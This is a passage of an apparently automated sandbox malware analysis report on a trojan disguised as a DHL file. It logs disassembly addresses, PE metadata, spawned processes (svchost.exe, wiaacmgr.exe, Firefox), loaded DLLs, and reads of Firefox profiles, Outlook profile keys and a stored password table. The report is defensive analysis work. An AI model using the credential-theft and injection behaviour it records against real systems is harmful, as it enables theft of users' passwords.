                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0490EFA05_2_0490EFA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04882FC85_2_04882FC8
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0489CFE05_2_0489CFE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04932F305_2_04932F30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048D2F285_2_048D2F28
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048B0F305_2_048B0F30
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04904F405_2_04904F40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048768B85_2_048768B8
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048BE8F05_2_048BE8F0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0489A8405_2_0489A840
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048928405_2_04892840
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048929A05_2_048929A0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0495A9A65_2_0495A9A6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048A69625_2_048A6962
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0488EA805_2_0488EA80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04946BD75_2_04946BD7
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494AB405_2_0494AB40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494F43F5_2_0494F43F
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048814605_2_04881460
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0492D5B05_2_0492D5B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049595C35_2_049595C3
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049475715_2_04947571
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049416CC5_2_049416CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048D56305_2_048D5630
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494F7B05_2_0494F7B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048970C05_2_048970C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0493F0CC5_2_0493F0CC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494F0E05_2_0494F0E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049470E95_2_049470E9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0489B1B05_2_0489B1B0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048C516C5_2_048C516C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0487F1725_2_0487F172
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0495B16B5_2_0495B16B
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048952A05_2_048952A0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048AB2C05_2_048AB2C0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049312ED5_2_049312ED
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048D739A5_2_048D739A
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494132D5_2_0494132D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0487D34C5_2_0487D34C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494FCF25_2_0494FCF2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04909C325_2_04909C32
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048AFDC05_2_048AFDC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04893D405_2_04893D40
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04941D5A5_2_04941D5A
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04947D735_2_04947D73
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04899EB05_2_04899EB0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04891F925_2_04891F92
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494FFB15_2_0494FFB1
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04853FD55_2_04853FD5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04853FD25_2_04853FD2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494FF095_2_0494FF09
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048938E05_2_048938E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048FD8005_2_048FD800
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_049259105_2_04925910
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048999505_2_04899950
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048AB9505_2_048AB950
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048D5AA05_2_048D5AA0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04931AA35_2_04931AA3
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0492DAAC5_2_0492DAAC
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0493DAC65_2_0493DAC6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04947A465_2_04947A46
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494FA495_2_0494FA49
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04903A6C5_2_04903A6C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048AFB805_2_048AFB80
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_04905BF05_2_04905BF0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048CDBF95_2_048CDBF9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0494FB765_2_0494FB76
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_028620E05_2_028620E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0285CFB75_2_0285CFB7
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0285CFC05_2_0285CFC0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0285B3255_2_0285B325
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0285B3305_2_0285B330
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0285B1E05_2_0285B1E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0285D1E05_2_0285D1E0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_028511225_2_02851122
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_028657905_2_02865790
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_028639805_2_02863980
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0286397D5_2_0286397D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0287BEE05_2_0287BEE0
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0474E76C5_2_0474E76C
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0474E2B55_2_0474E2B5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0474E3D55_2_0474E3D5
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0474D8385_2_0474D838
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0474CAD85_2_0474CAD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
                Source: C:\Users\user\Desktop\DHL.exeCode function: String function: 009C0A30 appears 46 times
                Source: C:\Users\user\Desktop\DHL.exeCode function: String function: 009A9CB3 appears 31 times
                Source: C:\Users\user\Desktop\DHL.exeCode function: String function: 009BF9F2 appears 40 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 048FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0490F290 appears 105 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 0487B970 appears 280 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 048D7E54 appears 111 times
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: String function: 048C5130 appears 58 times
                Source: DHL.exe, 00000000.00000003.1464305183.00000000037BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL.exe
                Source: DHL.exe, 00000000.00000003.1463668942.0000000003293000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL.exe
                Source: DHL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@9/6
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A137B5 GetLastError,FormatMessageW,0_2_00A137B5
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A010BF AdjustTokenPrivileges,CloseHandle,0_2_00A010BF
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00A016C3
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00A151CD
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00A2A67C
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00A1648E
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_009A42A2
                Source: C:\Users\user\Desktop\DHL.exeFile created: C:\Users\user\AppData\Local\Temp\autCA0B.tmpJump to behavior
                Source: DHL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wiaacmgr.exe, 00000005.00000003.1898749813.0000000002A84000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1898749813.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2701656661.0000000002AD5000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2701656661.0000000002AA6000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1901013083.0000000002AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL.exeVirustotal: Detection: 29%
                Source: DHL.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\DHL.exe "C:\Users\user\Desktop\DHL.exe"
                Source: C:\Users\user\Desktop\DHL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL.exe"
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL.exe"Jump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeProcess created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: scansetting.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: DHL.exeStatic file information: File size 1257984 > 1048576
                Source: DHL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: DHL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: DHL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: DHL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: DHL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: DHL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: DHL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eYHtcsfFquWF.exe, 00000004.00000002.2700431435.000000000012E000.00000002.00000001.01000000.00000005.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2700413450.000000000012E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: DHL.exe, 00000000.00000003.1463417563.0000000003690000.00000004.00001000.00020000.00000000.sdmp, DHL.exe, 00000000.00000003.1462103943.0000000003170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1707862463.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609031075.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1707862463.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611529786.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1707826366.00000000044CC000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.0000000004850000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1710157325.000000000469F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: DHL.exe, 00000000.00000003.1463417563.0000000003690000.00000004.00001000.00020000.00000000.sdmp, DHL.exe, 00000000.00000003.1462103943.0000000003170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1707862463.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609031075.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1707862463.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1611529786.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, wiaacmgr.exe, 00000005.00000003.1707826366.00000000044CC000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.0000000004850000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2711323024.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000003.1710157325.000000000469F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdbGCTL source: svchost.exe, 00000002.00000003.1674473037.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674557677.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708173284.0000000000B78000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wiaacmgr.pdb source: svchost.exe, 00000002.00000003.1674473037.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1674557677.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708173284.0000000000B78000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2712106181.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781779621.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2008088065.0000000038AAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: wiaacmgr.exe, 00000005.00000002.2701656661.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2712106181.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781779621.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2008088065.0000000038AAC000.00000004.80000000.00040000.00000000.sdmp
                Source: DHL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: DHL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: DHL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: DHL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: DHL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009A42DE
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C0A76 push ecx; ret 0_2_009C0A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A07C push ecx; iretd 2_2_0041A07D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407174 push ss; ret 2_2_00407192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405133 pushfd ; retf 2_2_00405135
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A9EE push edi; retf 2_2_0041A9FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A9F3 push edi; retf 2_2_0041A9FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AAE5 push es; ret 2_2_0040AAE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403290 push eax; ret 2_2_00403292
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D3B2 pushad ; retf 2_2_0040D3B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417609 push eax; retf 2_2_0041760A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004127CA push ebx; iretd 2_2_004127CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340225F pushad ; ret 2_2_034027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034027FA pushad ; ret 2_2_034027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340283D push eax; iretd 2_2_03402858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340135E push eax; iretd 2_2_03401369
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048527FA pushad ; ret 5_2_048527F9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0485225F pushad ; ret 5_2_048527F9
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0485283D push eax; iretd 5_2_04852858
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_048809AD push ecx; mov dword ptr [esp], ecx5_2_048809B6
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02864376 push eax; retf 5_2_02864377
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0286288C push ebx; ret 5_2_0286288D
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02864E70 push ss; retn 6E14h5_2_02864F22
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02866DE9 push ecx; iretd 5_2_02866DEA
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0286775B push edi; retf 5_2_0286776B
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02867760 push edi; retf 5_2_0286776B
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0285F537 push ebx; iretd 5_2_0285F538
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02857852 push es; ret 5_2_02857855
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_0286BE95 pushad ; ret 5_2_0286BEAB
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02851EA0 pushfd ; retf 5_2_02851EA2
                Source: C:\Windows\SysWOW64\wiaacmgr.exeCode function: 5_2_02853EE1 push ss; ret 5_2_02853EFF
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009BF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009BF98E
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A31C41
                Source: C:\Users\user\Desktop\DHL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
